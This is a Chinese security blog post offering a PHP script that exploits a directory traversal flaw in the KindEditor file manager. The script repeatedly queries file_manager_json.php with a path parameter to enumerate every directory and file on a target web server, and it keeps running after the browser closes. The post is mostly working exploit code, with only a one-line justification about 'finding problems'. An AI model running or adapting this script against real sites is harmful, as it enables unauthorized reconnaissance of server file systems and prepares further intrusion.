网络安全

利用KINDEDITOR的遍历漏洞的自动化遍历脚本

2015-04-09 12:24 作者:admin [大中小]

<?php

/**
 * 利用KINDEDITOR的遍历漏洞，采用脚本自己遍历出所有目录及文件，生成结构图 便于发现问题
 */
ob_end_clean();
ob_implicit_flush(1);
header("Content-Type: text/html; charset=UTF-8");
set_time_limit(0);
ignore_user_abort();//关掉浏览器，PHP脚本也可以继续执行.

$url = "http://wwww.xxx.com/js/php/file_manager_json.php?path=var/www/html/ivr.51jiabo.com/";

getdir($url);


function getdir($url){
    $json = file_get_contents($url);
    $arr = json_decode($json);
    echo($arr->current_dir_path)."<br />";
    foreach($arr->file_list as $key=>$value){
        if($value->is_dir == true)
        {
            getdir($url . $value->filename . "/");
        }
        else
        {
            echo $value->filename . "<br />";
        }
    }
}


//递归

本页关键词：

上一篇：电商网站流量劫持木马的分析与思考下一篇：一次服务器沦陷后的详细分析

最新动态: 一次服务器沦陷后的详细分析; 运营推广干货：运营推广的初期是; 利用KINDEDITOR的遍历漏洞的自动化遍; 电商网站流量劫持木马的分析与思; 电商网站流量劫持木马的分析与思; 高可用可伸缩网站架构实用经验谈; 编写可维护性强的网站前端代码; 分析网站前端代码，快速搜索、定

热门文章: 各大appengine云平台介绍; 企业在线建设运营的外卖小站上线; 写给程序员们的交互设计; 微信公众平台迁移到“淄博网站建; 简单一招让常见的黑客提权大杀器; 企业在线开发运营的电影迷网站上; 看这些人怎么用技术赚钱; 天天打折,天天淘宝(ttdz.net)立争做最

服务Q Q：75303307

网站优化

网站建设

网络安全

利用KINDEDITOR的遍历漏洞的自动化遍历脚本